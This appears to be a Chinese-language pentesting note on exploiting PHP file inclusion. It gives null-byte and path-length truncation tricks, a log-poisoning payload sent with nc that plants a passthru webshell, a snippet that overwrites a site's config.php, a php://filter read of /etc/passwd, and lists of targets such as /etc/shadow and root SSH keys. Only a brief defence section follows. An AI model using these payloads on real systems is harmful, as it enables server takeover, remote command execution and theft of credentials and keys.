include后的文件带后缀的利用条件:

(1)gpc=Off 不然%00会变成\0的

(2)php < 5.3.4  本人测试在5.4.4中未成功,详情见CVE-2006-7243

include包含的时候一定得有相关的权限,apache用户和所访问文件至少也得达到同组权限。

截断方法:

(1)%00,gpc=Off

(2)长文件名,linux超过4096字节就会被php截断,没有实验成功(5.2.8),windows 259字节,没尝试,这里与GPC没有关系。 linux下使用../../../../../etc/passwd/./././././././ ,windows使用.....,楼下连接测试成功或者和linux一样

包含文件技巧:

1,包含上传后的文件,比如说图片,文件等

2,data:// php://input等伪协议,需要allow_url_include=on

3,日志文件,access.log,通过nc来去掉header,防止空格被编码成%20.

root@kali:/var/log/apache2# nc 127.0.0.1 80

GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1

查看access.log有日志:

127.0.0.1 - - [09/Apr/2015:03:53:21 -0400] "root@kali:/var/log/apache2# nc -h" 400 582 "-" "-"

127.0.0.1 - - [09/Apr/2015:03:53:45 -0400] "GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1" 404 480 "-" "-"

然后直接加载该日志,如果日志很大的话,可以写一句话创建一个文件什么的,执行一次就能拿到shell

eg:

<?$fp=fopen("/homeirtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<span style="font-family: Arial, Helvetica, sans-serif;"><?php echo hacked ?></span><span style="font-family: Arial, Helvetica, sans-serif;">");fclose($fp);?></span>

4,/proc/self/environ中user-agent可改

(1):about:config 后加general.useragent.override ,value 填 <?phpinfo();?>即可,或者使用useragent switch

测试过程中,要么是没权限,要么是在这个文件中没有读到user-agent字段

5,session file

6,另外其他php创建的文件什么的

比较优雅的读出文件:

https://10.20.30.50/fi?file=php://filter/read=convert.base64-encode/resource=../../../../../etc/passwd%00

测试文件夹是否存在。。

../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00

用于目录遍历,需要读权限:

/var/lib/locate.db

/var/lib/mlocate/mlocate.db

/usr/local/apache2/conf/httpd.conf

有root权限:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_rsa.keystore

/root/.ssh/id_rsa.pub

/root/.ssh/known_hosts

/etc/shadow

/root/.bash_history

/root/.mysql_history

/proc/self/fd/fd[0-9]* (文件标识符)

/proc/mounts

/proc/config.gz

如何防范:

(1)gpc

(2)readdir限制

(3)当然不能动态包含了

file_exists,move_uploaded_files,file_get_contents都受影响

远程文件包含:

(1)allow_url_include=On,allow_url_fopen=On

可以用?来截断

可以用到php的协议来读取文件,这样就能包含php文件了,哈哈,不然包含php文件都是被执行了。

参考:

http://www.joychou.org/index.php/web/truncated.html

https://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

http://drops.wooyun.org/tips/3827